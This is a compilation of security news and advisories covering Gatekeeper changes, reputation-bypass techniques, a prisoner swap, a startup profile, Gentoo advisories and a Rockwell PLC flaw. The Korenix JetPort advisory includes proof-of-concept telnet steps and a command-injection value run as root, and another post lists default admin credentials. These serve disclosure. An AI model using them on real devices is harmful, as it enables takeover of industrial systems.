Apple on Tuesday announced an update to its next-generation macOS version that makes it a little more difficult for users to override Gatekeeper protections.
Gatekeeper is a crucial line of defense built into macOS designed to ensure that only trusted apps run on the operating system. When an app is downloaded from outside of the App Store and opened for the first time, it verifies that the

Malware / Software Security

Apple on Tuesday announced an update to its next-generation macOS version that makes it a little more difficult for users to override Gatekeeper protections.

Gatekeeper is a crucial line of defense built into macOS designed to ensure that only trusted apps run on the operating system. When an app is downloaded from outside of the App Store and opened for the first time, it verifies that the software is from an identified developer.

It also runs checks to ensure that the app is notarized and has not been tampered with to install malware on macOS systems. Furthermore, it requires user approval before allowing any such third-party app to be run.

It's this user approval mechanism that Apple has now tightened further with macOS Sequoia, the next iteration of the Mac operating system that's expected to be released next month.

"In macOS Sequoia, users will no longer be able to Control-click to override Gatekeeper when opening software that isn't signed correctly or notarized," Apple said.

"They'll need to visit System Settings > Privacy & Security to review security information for software before allowing it to run."

The move is seen as a way to counter stealer malware and backdoors targeting macOS that are often unsigned and trick users into bypassing Gatekeeper protections.

In July 2023, North Korean threat actors were observed propagating an unsigned disk image (DMG) file that impersonated a legitimate video call service named MiroTalk and unleashed its malicious behavior after a victim control-clicks and selects "Open" and ignores the security warning from Apple.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple’s New macOS Sequoia Tightens Gatekeeper Controls to Block Unauthorized Software

Protections like Windows Smart App Control are useful but susceptible to attacks that allow threat actors initial access to an environment without triggering any alerts.

Source: ozrimoz via Shutterstock

Reputation-based security controls may be less effective at protecting organizations against unsafe Web applications and content than many assume.

A new study by researchers at Elastic Security found attackers have developed several effective techniques over the past few years to bypass mechanisms that block or allow applications and content based on their reputation and trustworthiness.

**Multiple Available Techniques**

The techniques include using digitally signed malware tools to make them appear legit, as well as reputation hijacking, reputation tampering, and specially crafted LNK files. "Reputation-based protection systems are a powerful layer for blocking commodity malware," Elastic Security researcher Joe Desimone wrote in a report this week. "However, like any protection technique, they have weaknesses that can be bypassed with some care."

For the study, the researchers used Microsoft Windows Smart App Control (SAC) and SmartScreen technologies as examples of a reputation-based mechanism for which attackers have developed bypasses.

SmartScreen is a feature that Microsoft introduced with Windows 8 to protect users against malicious website applications and file downloads. It verifies whether files that have the Mark of the Web (MoTW) on them — or files that Windows tags as downloaded from the Internet — can be trusted. Smart App Control became available with Windows 11. It uses Microsoft's threat intelligence service to determine if an application is trustworthy enough to run or not. If the threat intelligence is unable to determine an app's trustworthiness, SAC verifies if the app is digitally signed before allowing it to run.

The researchers at Elastic Security discovered that attackers have multiple ways around these protections.

**LNK Stomping Around MoTW**

One common way that attackers have used as a way around Smart App Control is by signing their malware with an extended validation (EV) SSL certificate, Elastic Security said. Though certificate authorities require proof of identity before they issue an EV to a requesting entity, threat actors have found ways to address this requirement by impersonating legitimate businesses. In other instances, they have used specially crafted and invalid code signing signatures to JavaScript and MSI files to bypass MoTW checks. For the past six years at least, attackers have also abused a weakness in how Windows handles shortcut files (LNK) to essentially strip the MoTW from malicious LNK files and sneak them past SmartScreen said Elastic Security, which has dubbed the tactic "LNK Stomping."

Reputation hijacking — where an attacker exploits the good reputation of trusted applications, websites and other entities — is another tactic. Elastic Security found that attackers often target trusted script hosts — or programs that execute scripts — such as Lua, Node.js, and AutoHotkey for this type of attack. The bypass involves placing malicious content where the trusted script host will automatically find and execute it during its normal course. "Script hosts are an ideal target for a reputation hijacking attack. This is especially true if they include a foreign function interface (FFI) capability," Desimone wrote. "With FFI, attackers can easily load and execute arbitrary code and malware in memory."

Elastic Security also found attackers using a technique called reputation seeding to bypass reputation-based filtering mechanisms. For these attacks, threat actors first introduce their own seemingly benign binaries or executable files into a target system and wait for them to build up a positive reputation over time. Another variation is introducing a legit application with a known vulnerability to a target environment for later use. "Smart App Control appears vulnerable to seeding," Desimone said in his report. "After executing a sample on one machine, it received a good label after approximately 2 hours."

The security vendor recommends that organizations bolster their security by using behavior analysis tools to monitor for common attack tactics such as credential access, enumeration, in-memory evasion, persistence, and lateral movement.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Attackers Use Multiple Techniques to Bypass Reputation-Based Security

At least two Russian nationals serving prison sentences for cybercrime offenses, Vladislav Klyushin and Roman Seleznev, were released as part of the landmark prisoner swap.

Source: Blackboard via Shutterstock

A convicted dealer of credit card accounts and identity documents and a hacker who helped steal sensitive data from companies to inform stock trades were among the eight Russian nationals traded last week to that country's government in exchange for 16 imprisoned Americans and Europeans.

In the most extensive prisoner exchange since the Cold War, the United States and its allies traded eight convicted Russian nationals — including cybercriminals Vladislav Klyushin and Roman Valeryevich Seleznev — for the release of four Americans, five Germans, and seven Russian political prisoners. Since 2017, Seleznev has been serving a 14-year sentence for participating in a massive cyber-fraud ring that stole more than $9 million from banks and $50 million in consumer losses. Klyushin was sentenced in September 2023 to nine years in prison for taking part in a hack-and-trade scheme.

The fact that the two cybercriminals were included in the exchange shows the importance that the Russian government puts on cyber operations, says Waithera Junghae, associate on the incident response team at S-RM, a global corporate intelligence and cyber security consultancy.

"Cyber activity aligns closely with real-world events such as conflict in Russia-Ukraine, and therefore it's perhaps not unsurprising that we see individuals engaged in this activity feature in negotiations and resulting releases," she says.

The massive exchange involved US diplomacy as well as the cooperation of at least five allies: Germany, Norway, Poland, Slovenia, and Turkey. The United States and its allies gained the release of three American citizens, an American green card holder, five German citizens, and seven Russian political prisoners, according to the White House. In addition to the two cybercriminals, Russia freed Vadim Krasikov, previously held by Germany after being convicted of assassinating a Chechen separatist in Berlin, news reports stated.

In remarks on Aug. 1, President Joe Biden stressed that the five countries who helped make the deal possible — either by releasing prisoners or in helping with logistics — showed the importance of the United States' alliance partners.

"They all stepped up, and they stood with us," Biden said. "They stood with us, and they made bold and brave decisions, released prisoners being held in their countries who were justifiably being held, and provided logistical support to get the Americans home. So, for anyone who questions whether allies matter, they do. They matter."

**Cybercriminals Pursued Unique Approaches**

The two cybercriminals released by US authorities included Klyushin, 42, who monetized hacks in an uncommon — if not unique — way. The Russian businessman, who owned the Moscow-based IT-security firm M-13, worked with four other co-conspirators to steal information on corporate earnings from publicly traded businesses, making trades around more than 2,000 "earnings events," according to a statement by the US Attorney's Office for the District of Massachusetts. The scheme netted the group around $93 million.

The "hack-to-trade" scheme is not unique, but it is a rare way for financially motivated cybercriminals to make money, Junghae says.

"Financially motivated cybercriminals typically opt for the quickest and easiest routes to make money, including encrypting and exfiltrating data or engaging in payment diversion schemes," she says. "However, in this particular case, Klyushin's strategy involved hacking companies to obtain confidential information for trading purposes."

Meanwhile, Seleznev — as part of the credit-card theft ring, Carder.su — created an automated portal for selling credit card data, allowing members to log in, search for specific types of account holders and card information, and then purchase the data by checking out. Seleznev, who used the handles Track2, Bulba, and Ncux, was sentenced to 14 years in prison in 2017, following a guilty plea. Law enforcement charged more than 55 individuals related to Carder.su as part of a concerted investigation dubbed Operation Open Market.

The scale and ease of the cybercriminal operation made Selznev, a pioneer at the time, Junghae says.

"High-profile cases like Seleznev's can embolden other cybercriminals, encouraging them to pursue similar activities under the belief that they too can evade detection and prosecution," she says. "The techniques and methods Seleznev employed can be adapted and refined by other criminals, thereby enhancing their capabilities."

**Not a Major Factor for Law Enforcement**

Some international policy experts have argued that the successful negotiated release of legitimately convicted Russian criminals poses a risk: Rogue governments could be incentivized to trump up charges and arrest other nations' citizens. Since 2021, the Biden administration has negotiated the release of prisoners from Russia, Iran, and Venezuela, according to Reuters.

"While it is or would be great to have these individuals released, it underscores how hostage-taking has become a prominent and frequent — if not growing — element of Russian strategy toward the U.S. and the West," Ian Brzezinski, a former US defense official, told Reuters.

Yet, the prisoner exchange will not change how law enforcement agencies pursue and prosecute cybercriminals, S-RM's Junghae says.

"This was an historic move, years in the making, that likely won't be repeated for some time," she says. "So, it would be remiss for countries and their government administrations to base future activity around further negotiated releases."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Russia's Priorities in Prisoner Swap Suggest Cyber Focus

Cybersecurity startup RAD Security, a finalist in this year's Black Hat USA Startup Spotlight competition, looks for "drift events," or events that vary from the baseline.

Source: THP Creative via Alamy Stock Photo

Consider these two statistics: By 2025, 95% of new applications will be deployed on cloud-native platforms. And in 2023, 90% of teams working with containers and Kubernetes reported a breach.

RAD Security cites these two figures to illustrate the challenges enterprise defenders face in detecting supply chain and cloud-based attacks. The cybersecurity startup offers a behavioral cloud detection and response solution that generates a "consistent, predictable, behavioral baseline" of an organization's cloud environment in order to detect anomalous activity, according to the company, in response to emailed questions from Dark Reading.

RAD Security calls its approach "behavioral workload fingerprinting." Behavioral fingerprints are represented by the deduplicated hierarchy of programs, processes, and files that a container image exhibits at runtime. RAD Security creates "fingerprints that contain 'golden signals,' created by a proprietary algorithm, with key metrics and behaviors that indicate the health and security status of each container," the company says.

The company looks for "drift events," or those events that don't match the baseline, and adds posture and identity context so that defenders understand what is happening in the environment.

"Anomaly detection is not something you can verify in your environment, as it happens in a black box," the company says. "And there are simply not enough cloud attacks to be able to use machine learning to analyze millions of cloud attacks and find new ones."

This approach is appropriate for clouds because it is transparent and portable, the company says.

The team is currently working on making behavioral fingerprints a de facto standard for how behavioral detection and response is done in cloud security, "all the way from early on in the software supply chain to runtime," RAD Security says.

**Startup Spotlight Finalist**

RAD Security was a Kubernetes Security Operations Center (KSOC) until earlier this year. The name change reflects how the company's scope has evolved beyond being a "best-of-breed Kubernetes Security solution," according to the company. The RAD in RAD Security is not an acronym but references the fact that something radical is technically exciting and "an "irreverence to the status quo," the company says. The name RAD Security is "straightforward, just like the solution we provide."

The four finalists in this year's Black Hat Startup Spotlight competition — DryRun Security, Knostic, LeakSignal, and RAD Security — will present their business models to a panel of judges during the Black Hat USA Conference in Las Vegas on Tuesday, Aug. 6. The judges for this year’s competition are Ketaki Borade (senior analyst, Omdia), Coleen Coolidge (CISO adviser, SF Info Security), Trey Ford (CISO adviser), Hollie Hennessy (senior analyst, Omdia), Maria Markstedter (founder and CEO, Azeria Labs), Lucas Nelson (founding partner, Lytical Ventures), Robert J Stratton III (venture partner, NextGen Venture Partners), and Rik Turner (principal analyst, Omdia). The "Shark Tank"-style competition involves each finalist making a presentation and then answering questions from the panel.

Finalists have the opportunity to demonstrate their technology on the show floor at Black Hat. Visitors to RAD Security's booth will be able to see demonstrations of the platform. The company also announced new features to the platform to "change the way investigations are done in the cloud."

**Startup Brief**

If the company were a band, what would its band name be?

RAD, and our band would be a full experiential show (like the Sphere in Las Vegas) that engages all your senses.

If your company had a mascot, what would the mascot look like?

"Funny you should ask — we have unveiled our new mascot, their name is BRAD!" Brad is a bear that knows how to be rad when it comes to security.

Startup Spotlight: RAD Security Brings Behavioral Profiling to Cloud

Korenix JetPort Series version 1.2 suffers from insufficient authentication, command injection, and plaintext communication vulnerabilities.

CyberDanube Security Research 20240805-0  
-------------------------------------------------------------------------------  
                title| Multiple Vulnerabilities in JetPort Series  
              product| Korenix JetPort Series  
   vulnerable version| 1.2  
        fixed version| None  
           CVE number| CVE-2024-7395, CVE-2024-7396, CVE-2024-7397  
               impact| High  
             homepage| https://www.korenix.com/  
                found| 2024-04-01  
                   by| S. Dietz (Office Vienna)  
                     | CyberDanube Security Research  
                     | Vienna | St. Pölten  
                     |  
                     | https://www.cyberdanube.com  
-------------------------------------------------------------------------------

Vendor description  
-------------------------------------------------------------------------------  
"Korenix Technology, a Beijer group company within the Industrial Communication  
business area, is a global leading manufacturer providing innovative, market-  
oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
With decades of experiences in the industry, we have developed various product  
lines [...].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-  
Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer  
base covers different Sales channels, including end-customers, OEMs, system  
integrators, and brand label partners. [...]"

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions  
-------------------------------------------------------------------------------  
Korenix JetPort 5601v3 / v1.2

Vulnerability overview  
-------------------------------------------------------------------------------  
1) Insufficient Authentication (CVE-2024-7395)  
The configuration service on port 600/tcp doesnt require authentication to be  
used. This allows an attacker to change the password or other critical  
information.

2) Plaintext Communication (CVE-2024-7396)  
The communication of the configuration service is transmitted in plain text.  
An attacker could use this information to sniff passwords or other critical  
information.

3) Unauthenticated Command Injection (CVE-2024-7397)  
An attacker with network access an can execute arbitrary commands as root user  
via the management service on port 600/tcp.

Proof of Concept  
-------------------------------------------------------------------------------  
1) Insufficient Authentication (CVE-2024-7395)  
The management software JetPort Commander is used as an frontend for the telnet  
service on 600/tcp. While it is possible to set a password, the passwords gets  
sent to the software in cleartext and gets validated on the client software  
rather than on the device. An attacker can bypass the management software by  
using telnet to directly connect to the port. This allows him to reconfigure  
the device including passwords and access controls.

$ telnet 192.168.122.76 600  
Trying 192.168.122.76...  
Connected to 192.168.122.76.  
Escape character is '^]'.  
-> setpassword poc

target:/$ cat /tmp/com2ip.conf  
version:1.2.0  
model:JetPort5601v3  
name:JetPort5601v3-DEFAULT  
serialno:0000000000000000  
password:poc  
switchmode:redundant  
network:static:192.168.122.76:192.168.10.1:192.168.10.1

2) Plaintext Communication (CVE-2024-7396)  
The management service uses telnet as protocol. We used tcpdump to inspect the  
traffic during a password change. The new password (newpass) is readable during  
transmission.

# sudo tcpdump -i virbr0 dst port 600 -X  
14:17:25.461197 IP 192.168.122.240.49600 > 192.168.122.76.600: Flags [P.], seq 0:21, ack 13, win 16422, length 21  
      0x0000:  4500 003d 16a7 4000 8006 6d86 c0a8 7af0  E..=..@...m...z.  
      0x0010:  c0a8 7a4c c1c0 0258 522b 6096 12eb 337d  ..zL...XR+`...3}  
      0x0020:  5018 4026 76bd 0000 7365 7470 6173 7377  P.@&v...setpassw  
      0x0030:  6f72 6420 6e65 7770 6173 730d 0a         ord.newpass..

3) Unauthenticated Remote Code Execution (CVE-2024-7397)  
The management service on port 600/tcp is used to configure JetPort devices  
over the network. An attacker can inject arbitrary commands in multiple  
settings options. The binary ser2net receives the data via the telnet  
protocol and translates it to arguments for system() calls. For our PoC we  
used the setsntp option to create the file /tmp/pwned.

$ telnet 192.168.122.76 600  
Trying 192.168.122.76...  
Connected to 192.168.122.76.  
Escape character is '^]'.  
-> setsntp pool.ntp.org$(touch /tmp/pwned),123,Asia/Taipei,1  
OK  
->

target:/$ ls -rtlha /tmp/  
drwxrwxr-x   17 root     0            1.0k Apr  4 10:41 ..  
-rw-r--r--    1 root     0               4 Apr  4 12:28 thttpd.pid  
-rw-r--r--    1 root     0             712 Apr  4 12:29 com2ip.conf  
-rw-r--r--    1 root     0               0 Apr  4 12:33 pwned  
-------------------------------------------------------------------------------

The vulnerabilities were manually verified on an emulated device by using the  
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution  
-------------------------------------------------------------------------------  
None. Device is End-of-Life.

Workaround  
-------------------------------------------------------------------------------  
Limit the access to the device and place it within a segmented network.

Recommendation  
-------------------------------------------------------------------------------  
CyberDanube recommends customers from Korenix to remove the device from their  
network topology.

Contact Timeline  
-------------------------------------------------------------------------------  
2024-04-08: Contacting Beijer Electronics Group via cs@beijerelectronics.com.  
2024-05-07: Received confirmation that the issue is beeing looked into.  
2024-06-10: Contact stated that the product is considered EoL and will no  
            longer receive security updates.  
2024-06-10: Confirm receipt and telling them that we will publish the  
            advisory after our 90-days deadline.  
2024-08-05: Publication of the Advisory.

Web: https://www.cyberdanube.com  
Twitter: https://twitter.com/cyberdanube  
Mail: research at cyberdanube dot com

EOF Sebastian Dietz / @2024

Korenix JetPort Series 1.2 Command Injection / Insufficient Authentication

Gentoo Linux Security Advisory 202408-2 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could lead to remote code execution. Versions greater than or equal to 115.12.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: August 06, 2024  
     Bugs: #930380, #932374, #935550  
       ID: 202408-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could lead to remote code execution.

Background  
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
=================

Package                 Vulnerable      Unaffected  
----------------------  --------------  ---------------  
www-client/firefox      < 115.12.0:esr  >= 115.12.0:esr  
                        < 127.0:rapid   >= 127.0:rapid  
www-client/firefox-bin  < 115.12.0:esr  >= 115.12.0:esr  
                        < 127.0:rapid   >= 127.0:rapid

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-127.0:rapid"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-127.0:rapid"

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-115.12.0:esr"

All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-115.12.0:esr"

References  
==========

[ 1 ] CVE-2024-2609  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2609  
[ 2 ] CVE-2024-3302  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3302  
[ 3 ] CVE-2024-3853  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3853  
[ 4 ] CVE-2024-3854  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3854  
[ 5 ] CVE-2024-3855  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3855  
[ 6 ] CVE-2024-3856  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3856  
[ 7 ] CVE-2024-3857  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3857  
[ 8 ] CVE-2024-3858  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3858  
[ 9 ] CVE-2024-3859  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3859  
[ 10 ] CVE-2024-3860  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3860  
[ 11 ] CVE-2024-3861  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3861  
[ 12 ] CVE-2024-3862  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3862  
[ 13 ] CVE-2024-3864  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3864  
[ 14 ] CVE-2024-3865  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3865  
[ 15 ] CVE-2024-4764  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4764  
[ 16 ] CVE-2024-4765  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4765  
[ 17 ] CVE-2024-4766  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4766  
[ 18 ] CVE-2024-4771  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4771  
[ 19 ] CVE-2024-4772  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4772  
[ 20 ] CVE-2024-4773  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4773  
[ 21 ] CVE-2024-4774  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4774  
[ 22 ] CVE-2024-4775  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4775  
[ 23 ] CVE-2024-4776  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4776  
[ 24 ] CVE-2024-4778  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4778  
[ 25 ] CVE-2024-5689  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5689  
[ 26 ] CVE-2024-5693  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5693  
[ 27 ] CVE-2024-5694  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5694  
[ 28 ] CVE-2024-5695  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5695  
[ 29 ] CVE-2024-5696  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5696  
[ 30 ] CVE-2024-5697  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5697  
[ 31 ] CVE-2024-5698  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5698  
[ 32 ] CVE-2024-5699  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5699  
[ 33 ] CVE-2024-5700  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5700  
[ 34 ] CVE-2024-5701  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5701  
[ 35 ] CVE-2024-5702  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5702  
[ 36 ] MFSA-2024-25  
[ 37 ] MFSA-2024-26  
[ 38 ] MFSA-2024-28

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-02

Gentoo Linux Security Advisory 202408-1 - Multiple vulnerabilities have been discovered in containerd, the worst of which could lead to privilege escalation. Versions greater than or equal to 1.6.19 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: containerd: Multiple Vulnerabilities  
     Date: August 06, 2024  
     Bugs: #897960  
       ID: 202408-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in containerd, the worst  
of which could lead to privilege escalation.

Background  
==========

containerd is a daemon with an API and a command line client, to manage  
containers on one machine. It uses runC to run containers according to  
the OCI specification.

Affected packages  
=================

Package                    Vulnerable    Unaffected  
-------------------------  ------------  ------------  
app-containers/containerd  < 1.6.19      >= 1.6.19

Description  
===========

Multiple vulnerabilities have been discovered in containerd. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All containerd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-containers/containerd-1.6.19"

References  
==========

[ 1 ] CVE-2023-25153  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25153  
[ 2 ] CVE-2023-25173  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25173

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-01

Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

**Computer Laboratory Management System 1.0 Insecure Settings**

Posted Aug 6, 2024

Authored by indoushka

Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 903fb54e0bd8fb8efe43fdddb49a0f5abaa23ea96b8495e4f7c47b36636f9f0d

Download | Favorite | View

**Computer Laboratory Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Computer Laboratory Management System v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,255)
*   Arbitrary (16,849)
*   BBS (2,859)
*   Bypass (1,860)
*   CGI (1,033)
*   Code Execution (7,786)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,385)
*   DoS (25,039)
*   Encryption (2,389)
*   Exploit (53,128)
*   File Inclusion (4,258)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,888)
*   Intrusion Detection (915)
*   Java (3,142)
*   JavaScript (896)
*   Kernel (7,188)
*   Local (14,791)
*   Magazine (586)
*   Overflow (13,166)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,632)
*   Remote (31,643)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,025)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,604)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,932)
*   Web (9,955)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,246)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,087)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,536)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,612)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,441)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,727)
*   UNIX (9,433)
*   UnixWare (187)
*   Windows (6,668)
*   Other

Computer Laboratory Management System 1.0 Insecure Settings

A security vulnerability in Rockwell Automation's ControlLogix 1756 programmable logic controllers, tracked as CVE-2024-6242, could allow tampering with physical processes at plants.

Source: Kay Roxby via Alamy Stock Photo

A security bypass vulnerability in Rockwell Automation ControlLogix 1756 devices could open critical infrastructure to cyberattacks on the operational technology (OT) that controls physical processes.

According to Claroty's Team82, the bug (CVE-2024-6242, CVSS 8.4), could allow a remote attacker with network access to the device to send elevated commands to the CPU of a programmable logic controller (PLC), from an untrusted chassis card.

"Our technique allowed us to bypass the trusted slot feature implemented by Rockwell that enforces security policies and allows the controller to deny communication via untrusted paths on the local chassis," Claroty researcher Sharon Brizinov explained in a blog posting on the bug.

The result? Successful attackers can download new logic for controlling a PLC's behavior, and send other elevated commands that would interfere with the physical operations of a manufacturing site.

Rockwell has issued a fix, and users are urged to apply it immediately; and the Cybersecurity and Infrastructure Security Agency has published mitigation advice, noting that exploitation is a low-complexity endeavor.

According to Rockwell, ControlLogix, GuardLogix, and 1756 ControlLogix I/O Modules, widely deployed in industrial manufacturing environments, are affected by the vulnerability.

**Manipulating the Trusted Slot Mechanism**

The 1756 chassis is a modular enclosure that houses various cards within physical slots that are responsible for communicating with sensors, actuators, and other OT equipment; they also provide the physical and electrical connections to allow those components to interoperate and talk to each other. All of the communication and connections are carried out via a shared circuit board known as the backplane, using the common industrial protocol, or CIP.

"A 1756 PLC in a production line might be connected to multiple sources via different network cards, for example, the human-machine interface (HMI) panel, engineering workstation, and other devices," Brizinov explained. "To ensure that only specific individual devices are performing elevated operations on the PLC such as download logic, a security mechanism was introduced called trusted slot."

The trusted-slot feature ensures that only authorized slots can communicate with each other, protecting against potential tampering. It does this by requiring slots to essentially authenticate to the PLC.

However, Claroty found a way around that.

"Since all slots are connected via the backplane, and CIP supports path (routing), we could generate a CIP packet that will be routed through a trusted card before it reaches the CPU," according to the blog post. "Basically, the method involved 'jumping' between local backplane slots…This technique allowed us to traverse the security boundary that was meant to protect the CPU from untrusted cards."

To prevent the exposure of critical control systems to unauthorized access over the CIP protocol, site security administrators should apply Rockwell's patches immediately:

*   ControlLogix 5580 (1756-L8z): Update to versions V32.016, V33.015, V34.014, V35.011, and later.
    
